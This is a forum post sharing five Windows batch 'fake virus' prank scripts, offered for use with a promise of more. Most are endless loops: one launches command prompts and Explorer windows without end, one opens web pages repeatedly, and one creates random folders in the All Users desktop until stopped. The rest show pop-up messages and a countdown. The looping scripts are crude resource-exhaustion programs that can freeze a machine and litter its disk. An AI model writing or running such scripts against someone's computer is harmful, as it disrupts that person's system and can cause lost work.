hey people, iv seen all of this posts about the same shutdown "fake virus" and cmd tricks so ifd like to tell u some of them(5) depending on the thanks il try to get u more
this one starts cmds and my documents...alot of them
@echo off
:A
start
explorer
goto :A
opens internet pages(u can add as many as you want to)
@echo off
:A
start www. google .com sorry
goto :A
makes a bunch of folders...my pc is in spanish so you may have to change the directory to one in english its the "cd "C:\Documents..."" thing
@echo off
:folder
md %random%
cd "C:\Documents and Settings\All Users\Escritorio"
goto :folder
timer
@echo off
:A
echo 31
ping localhost -n 2 > nul
cls
echo 30
ping localhost -n 2 > nul
etc....
goto :A
lol error messages
@echo off
msg * hello
msg * you can edit this text
msg * exept the "msg * " thing
so maybe ill add some more but their all encrypted about 3 years ago and i forgot the password so itl take me some time to post them...
